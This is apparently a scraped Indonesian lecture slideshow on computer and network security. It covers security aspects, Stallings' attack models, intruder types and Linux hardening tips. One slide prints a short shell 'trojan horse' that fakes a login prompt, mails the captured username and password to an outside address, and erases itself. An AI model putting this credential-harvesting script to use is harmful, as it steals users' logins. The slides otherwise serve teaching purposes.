430 likes | 768 Views
PENDAHULUAN. Konsep Dasar Komunikasi : Perkembangan Teknologi Informasi (TI) menyebabkan perubahan terhadap cara pandang manusia terhadap suatu informasi Informasi merupakan isi ( content ) yang dibawa oleh proses komunikasi
E N D
PENDAHULUAN Konsep Dasar Komunikasi : Perkembangan Teknologi Informasi (TI) menyebabkan perubahan terhadap cara pandang manusia terhadap suatu informasi Informasi merupakan isi (content) yang dibawa oleh proses komunikasi Informasi harus terjamin kesahihan dan validitasnya
Informasi Mengandung muatan-muatan data yang dijadikan sebagai the meaning of content dalam komunikasi Kumpulan bit-bit data yang mempunyai makna tertentu, yang diolah dengan cara tertentu dan dikomunikasikan dengan cara tertentu (sudut pandang informatika) Informasi sebagai view of point • Bagaimana informasi bisa diolah sehingga dapat dimanfaatkan • secara optimal, misal mudah ditemukan saat dibutuhkan • Bagaimana validitas dan kebenaran informasi bisa dijamin • Bagaimana informasi rahasia bisa diamankan
Komputer dan Informasi Komputer sebagai penghasil informasi ? Komputer sebagai pengolah informasi ? Komputer sebagai sarana komunikasi informasi ? Komputer sebagai alat validasi informasi ? Komputer sebagai pengontrol informasi ? Era Komputerisasi Informasi • Komputer dianggap sebagai pusat dari proses informasi : • Komputer sebagai penghasil dan pengolah • informasi • Komputer tersebut bebas dari gangguan sistem • dan keamanan • Utamakan keamanan Informasi
Keamanan Komputer meliputi : • KeamananFisik (Hardware) • Ancaman-ancaman : • - Hubungsingkatjalurrangkaian MB • - KenaikanSuhuKomputer • - Tegangan Yang Tidakstabil • - KerusakanAkibatListrikStatis
Keamanan yang bersifatfisik(physical security): termasukakses orang kegedung, peralatan, dan media yang digunakan. Contoh : • Wiretappingatauhal-hal yang ber-hubungandenganakseskekabelataukomputer yang digunakanjugadapatdimasukkankedalamkelasini. • Denial of service, dilakukanmisalnyadenganmematikanperalatanataumembanjirisalurankomunikasidenganpesan-pesan (yang dapatberisiapasajakarena yang diutamakanadalahbanyaknyajumlahpesan). • Synch Flood Attack, dimanasistem (host) yang ditujudibanjiriolehpermintaansehinggadiamenjaditerlalusibukdanbahkandapatberakibatmacetnyasistem (hang).
Keamanan yang berhubungandengan orang (personel), Contoh : • Identifikasi user (username dan password) • Profil resiko dari orang yang mempunyai akses (pemakai dan pengelola). Keamanan dari data dan media serta teknik komunikasi (communications). Keamanandalamoperasi: Adanyaprosedur yang digunakanuntuk mengaturdanmengelolasistemkeamanan, Dan Jugater-masukprosedursetelahserangan (post attack recover)
KarakteristikPenyusup • The Curious (Si InginTahu) - tipepenyusupinipadadasarnyatertarikmenemukanjenissistemdan data yang andamiliki. • The Malicious (Si Perusak) - tipepenyusupiniberusahauntukmerusaksistemanda, ataumerubah web page anda. • The High-Profile Intruder (Si ProfilTinggi) - tipepenyusupiniberusahamenggunakansistemandauntukmemperolehpopularitasdanketenaran. Diamungkinmenggunakansistemprofiltinggiandauntukmengiklankankemampuannya. • The Competition (Si Pesaing) - tipepenyusupinitertarikpada data yang andamilikidalamsistemanda. Iamungkinseseorang yang beranggapanbahwaandamemilikisesuatu yang dapatmenguntungkannyasecarakeuanganatausebaliknya
Istilahbagipenyusup • Mundane ; tahumengenai hacking tapitidakmengetahuimetodedanprosesnya. • lamer (script kiddies) ; mencobascript2 yang pernahdibuatolehaktivis hacking, tapitidakpahambagaimanacaramembuatnya. • wannabe ; pahamsedikitmetode hacking, dansudahmulaiberhasilmenerobossehinggaberfalsafah ; HACK IS MY RELIGION. • larva (newbie) ; hacker pemula, teknik hacking mulaidikuasaidenganbaik, seringbereksperimen. • hacker ; aktivitas hacking sebagai profesi. • wizard ; hacker yang membuatkomunitaspembelajarandiantaramereka. • guru ; master of the master hacker, lebihmengarahkepenciptaan tools-tools yang powerfull yang salahsatunyadapatmenunjangaktivitas hacking, namunlebihjadi tools pemrograman system yang umum.
KeamananSistem Software • Pengamanan Sistem Operasi • Pengamanan Sistem Basis Data • Pengamanan Program Aplikasi
Mengapa perlu aman ? Resiko kerugian finansial Resiko kerugian kerahasiaan Resiko kerugian harga diri Dan lain-lain Motif-motif serangan pada sistem komputer : Politis Finansial Dendam (sakit hati) Iseng Sebagai pekerjaan (cracker bayaran) Dan lain-lain
Aspek-aspek keamanan :Garfinkel “PGP” O’Reilrlly & Associates Inc 1995 • 1. Privacy / Confidentiality • Defenisi : menjagainformasidariorang yang tidakberhakmengakses. • Privacy : lebihkearah data-data yang sifatnyaprivat , Contoh : e-mail seorangpemakai(user) tidakbolehdibacaoleh administrator. • Confidentiality : berhubungandengan data yang diberikankepihak lain untukkeperluantertentudanhanyadiperbolehkanuntukkeperluantertentutersebut.
Contoh : data-data yang sifatnyapribadi (sepertinama, tempattanggallahir, social security number, agama, status perkawinan, penyakit yang pernahdiderita, nomorkartukredit, dansebagainya) harusdapatdiproteksidalampenggunaandanpenyebarannya. • BentukSerangan : usahapenyadapan (dengan program sniffer). • Usaha-usaha yang dapatdilakukanuntukmeningkatkan privacy dan confidentiality adalahdenganmenggunakanteknologikriptografi
Integrity • Defenisi : informasitidakbolehdiubahtanpaseijinpemilikinformasi. • Contoh : e-mail diintercept ditengahjalan, diubahisinya, kemudianditeruskankealamat yang dituju. • Bentukserangan : Adanya virus, trojan horse, ataupemakai lain yang mengubahinformasitanpaijin, “man in the middle attack” dimanaseseorangmenempatkandiriditengahpembicaraandanmenyamarsebagaiorang lain.
Authentication • Defenisi : metodauntukmenyatakanbahwainformasibetul-betulasli, atauorang yang mengaksesataumemberikaninformasiadalahbetul-betulorang yang dimaksud.
Dukungan : • Adanya Tools membuktikankeasliandokumen, dapatdilakukandenganteknologi watermarking(untukmenjaga“intellectual property”, yaitudenganmenandaidokumenatauhasilkaryadengan “tandatangan” pembuat ) dan digital signature. • Access control, yaituberkaitandenganpembatasan orang yang dapatmengaksesinformasi. User harusmenggunakan password, biometric (ciri-cirikhas orang), dansejenisnya.
Availability • Defenisi : berhubungandenganketersediaaninformasiketikadibutuhkan. • Contohhambatan : • “denial of service attack” (DoS attack), dimana server dikirimipermintaan (biasanyapalsu) yang bertubi-tubiataupermintaan yang diluarperkiraansehinggatidakdapatmelayanipermintaan lain ataubahkansampai down, hang, crash.
mailbomb, dimanaseorangpemakaidikirimie-mail bertubi-tubi (katakanribuan e-mail) denganukuran yang besarsehingga sang pemakaitidakdapatmembuka e-mailnyaataukesulitanmengakses e-mailnya.
Access Control • Defenisi : carapengaturanakseskepadainformasi. berhubungandenganmasalah • authentication danjuga privacy • Metode : menggunakankombinasiuserid/password ataudengan • menggunakanmekanisme lain
Non-repudiation • Defenisi : Aspekinimenjaga agar seseorangtidakdapatmenyangkaltelahmelakukansebuahtransaksi. Dukunganbagi electronic commerce.
Security Attack Models : Menurut W. Stallings [William Stallings, “Network and Internetwork Security,” Prentice Hall, 1995.] serangan (attack) terdiri dari : • Interruption: Perangkatsistemmenjadirusakatautidaktersedia. Seranganditujukankepadaketersediaan (availability) darisistem. Contohseranganadalah “denial of service attack”. • Interception: Pihak yang tidakberwenangberhasilmengakses asset atauinformasi. Contohdariseranganiniadalahpenyadapan (wiretapping).
Modification: Pihak yang tidakberwenangtidaksajaberhasilmengakses, akantetapidapatjugamengubah (tamper) aset. Contohdariseranganiniantara lain adalahmengubahisidari web site denganpesan-pesan yang merugikanpemilik web site. • Fabrication: Pihak yang tidakberwenangmenyisipkanobjekpalsukedalamsistem. Contohdariseranganjenisiniadalahmemasukkanpesan-pesanpalsuseperti e-mail palsukedalamjaringankomputer
Interruption Suatu aset sistem dihancurkan, sehingga tidak lagi tersedia atau tidak dapat digunakan Misalnya : perusakan terhadap suatu item hardware, pemutusan jalur komunikasi, disable sistem manajemen file Serangan terhadap layanan availability sistem
Interception Pengaksesan asset informasi oleh orang yang tidak berhak Misalnya oleh seseorang, program, atau komputer Contoh serangan ini pencurian data pengguna kartu kredit Pengerangan terhadap layanan confidentiality
Modification Pengaksesan data oleh orang yang tidak berhak, kemudian ditambah, dikurangi, atau diubah setelah itu baru dikirimkan pada jalur komunikasi Contoh pengubahan suatu nilai file data Merupakan jenis serangan terhadap layanan integrity
Fabrication Seorang user yang tidak berhak mengambil data, kemudian menambahkannya dengan tujuan untuk dipalsukan Merupakan serangan terhadap layanan authentication
Memahami Hacker bekerja Secaraumummelaluitahapan-tahapan sebagaiberikut : • Tahapmencaritahu system komputersasaran. • Tahappenyusupan • Tahappenjelajahan • Tahapkeluardanmenghilangkanjejak.
#!/bin/sh • ################################### • # Nama program : my_login • # Deskripsi :Program kuda trojan sederhana • # versi 1.0 February 30 TahunKuda • #################################### • COUNTER=0 • Cat /etc/issue • While [ "$COUNTER" –ne 2 ] • do • let COUNTER=$COIUNTER+1 • echo "login: \c" • read LOGIN • stty echo • echo "password: \c" • read PASSWORD • echo "User $LOGIN : $PASSWORD" | mail gadis@company.com • stty echo • echo • echo "Login Incorrect" • done • rm $0 • kill –9 $PPID
PRINSIPDASARPERANCANGAN SISTEM YANG AMAN • Mencegahhilangnya data • Mencegahmasuknyapenyusup
LapisanKeamanan 1. LapisanFisik : • membatasiaksesfisikkemesin : • Aksesmasukkeruangankomputer • pengunciankomputersecara hardware • keamanan BIOS • keamananBootloader • back-up data : • pemilihanpiranti back-up • penjadwalan back-up
mendeteksigangguanfisik : • log file : Log pendekatautidaklengkap, Log yang berisikanwaktu yang aneh, Log denganpermisiataukepemilikan yang tidaktepat, Catatanpelayanan reboot atau restart, Log yang hilang, masukansuatau login daritempat yang janggal • mengontrolaksessumberdaya.
2. Keamananlokal • Berkaitan dengan user dan hak-haknya : • Beri mereka fasilitas minimal yang diperlukan. • Hati-hatiterhadapsaat/darimanamereka login, atautempatseharusnyamereka login. • Pastikan dan hapus rekening mereka ketika mereka tidak lagi membutuhkan akses.
3. Keamanan Root • Ketikamelakukanperintah yang kompleks, cobalahdalamcara yang tidakmerusakdulu, terutamaperintah yang menggunakanglobbing: contoh, andainginmelakukan (rm) • foo*.bak", pertamacobadulu: "lsfoo*.bak" danpastikanandainginmenghapus file-file yang andapikirkan.
Beberapa orang merasaterbantuketikamelakukan "touch /-i" padasistemmereka. Hal iniakanmembuatperintah-perintahseperti : "rm -fr *" menanyakanapakahandabenar-benaringinmenghapusseluruh file. (Shell andamenguraikan "-i" dulu, danmemberlakukannyasebagai option -ikerm). • Hanyamenjadi root ketikamelakukantugastunggaltertentu. Jikaandaberusahamengetahuibagaimanamelakukansesuatu, kembalike shell pemakai normal hinggaandayakinapa yang perludilakukanoleh root.
Jalurperintahuntukpemakai root sangatpenting. Cobalahdanbatasijalurperintahbagipemakai root sedapatmungkin, danjanganpernahmenggunakan '.', yang berarti 'direktorisaatini', dalampernyataan PATH anda. Sebagaitambahan, janganpernahmenaruhdirektori yang dapatditulispadajalurpencariananda, karenahalinimemungkinkanpenyerangmemodifikasiataumenaruh file binerdalamjalurpencariananda, yang memungkinkanmerekamenjadi root ketikaandamenjalankanperintahtersebut.
Janganpernahmenggunakanseperangkatutilitas rlogin/rsh/rexec (disebututilitas r) sebagai root. Merekamenjadisasaranbanyakserangan, dansangatberbahayabiladijalankansebagai root. Janganmembuat file .rhostsuntuk root.
File /etc/security berisikandaftar terminal-terminal tempat root dapat login. Secarabaku (padaRedHat Linux) disethanyapadakonsol virtual lokal (vty). Berhati-hatilahsaatmenambahkan yang lain ke file ini. Andaseharusnya login darijarakjauhsebagaipemakaibiasadankemudian 'su' jikaandabutuh (mudah-mudahanmelaluisshatausaluranterenkripsi lain), sehinggatidakperluuntuk login secaralangsungsebagai root.
Selaluperlahandanberhati-hatiketikamenjadi root. Tindakanandadapatmempengaruhibanyakhal. Pikirsebelumandamengetik!
4. Keamanan File dan system file • Directory home user tidakbolehmengaksesperintahmengubah system sepertipartisi, perubahan device dan lain-lain. • Lakukan setting limit system file. • Aturaksesdan permission file : read, write, execute bagi user maupun group. • Selalucek program-program yang tidakdikenal
5. Keamanan Password danEnkripsi • Hati-hatiterhadap brute force attack denganmembuat password yang baik. • Selalumengenkripsi file yang dipertukarkan. • Lakukan pengamanan pada level tampilan, seperti screen saver.
6. Keamanan Kernel • selalu update kernel system operasi. • Ikuti review bugs dankekurang-kekuranganpada system operasi 7. KeamananJaringan • Waspadaipaket sniffer yang seringmenyadap port Ethernet. • Lakukanproseduruntukmengecekintegritas data • Verifikasiinformasi DNS • Lindungi network file system • Gunakan firewall untuk barrier antarajaringan private denganjaringaneksternal